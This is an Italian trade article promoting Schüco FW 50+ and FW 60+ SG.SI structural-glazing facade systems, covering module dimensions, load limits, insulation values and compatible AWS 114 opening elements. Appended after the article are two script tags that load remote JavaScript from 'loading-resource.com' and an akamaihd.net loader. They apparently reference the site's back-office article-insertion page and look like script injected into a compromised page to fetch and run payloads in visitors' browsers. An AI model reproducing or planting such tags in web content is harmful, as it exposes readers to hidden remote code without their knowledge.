Ora divengono i prodotti di punta in termini di capacità isolante grazie al nuovo listello isolante e ai vetri camera con uno o due intercapedini che consentono standard di performance che sfiorano la perfezione
Il sistema per facciate Schüco FW 50+ SG.SI e FW 60+ SG.SI rappresenta una soluzione di prestigio per la realizzazione di involucri edilizi, sia in termini tecnici che architettonici. I moduli di questa facciata in vetro strutturale possono raggiungere dimensioni massime di 2.600 mm x 4.200 mm e grazie a nuovi “cavallotti” si possono supportare carichi fino a 600 kg per traverso. In presenza di tripli vetri è possibile montare vetri di spessore fino a 64 mm.
I profili portanti della facciata con tamponamenti strutturali sono visibili solo dall’interno, garantendo così un’estetica complanare. Dall’esterno sono visibili esclusivamente superfici in vetro con sottilissime fughe.
Le facciate SG oltre a permettere la realizzazione di vetrate ad incollaggio strutturale, consentono anche di progettare facciate con estetica semi-strutturale. È possibile creare molteplici soluzioni architettoniche utilizzando un’ampia gamma di copertine che, poste sulle fughe, permettono di accentuare l’estetica orizzontale e verticale della facciata.
I parametri tecnici delle facciate SG lasciano agli architetti la massima libertà di progettazione, senza penalizzare l’isolamentotermico che l’intensa ricerca nei laboratori di Bielefeld ha evoluto e perfezionato in termini di performance tecnologiche che ora raggiungono l’eccellenza nell’efficienza energetica.
Infatti, i sistemi di facciate Schüco FW 50+ e FW 60+ nella versione SG sono già isolati termicamente e nella versione a elevato isolamento termico SG.SI raggiungono i livelli di Casa Passiva. Varie componenti concorrono all’ottenimento di bassi valori U.
Il sistema isolante, composto da listelli SI e da una guarnizione cellulare, unitamente a una vetratura tripla, garantiscono un isolamento termico da record, con valori Uf a partire da 0,9 W/(m²K).
Per quanto riguarda il bordo del tamponamento vetrato, oltre alle due soluzioni possibili proposte in vetro o in acciaio ora è disponibile a catalogo una nuova versione: utilizzando accessori standard di fissaggio è possibile inserire sul bordo di tamponamento delle apposite “tasche” in materiale sintetico. Questo consente una nuova tecnica di aggancio che permette di bloccare i tamponamenti vetrati puntualmente sulle “tasche” e rende ancora più flessibile la proposta del sistema costruttivo Schüco.
Un ulteriore vantaggio di questo sistema per facciate è la sua compatibilità con altri componenti Schüco. Ad esempio, i nuovissimi elementi apribili ad inserimento Schüco AWS 114, AWS 114.SG, AWS 114.SI e AWS 114 SG.SI si integrano elegantemente nel quadro di facciate strutturali. Possono essere impiegati come elementi con apertura verso l’esterno a sporgere o parallela e con sicurezza anticaduta grazie all’uso di un limitatore di apertura ad assorbimento di energia. Possono essere azionati manualmente oppure mediante l’apparecchiatura a scomparsa Schüco TipTronic. È possibile realizzare anche soluzioni in grandi formati, con un peso d’anta massimo di 250 kg.
<script src="https://loading-resource.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&d=2012-10-16&s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>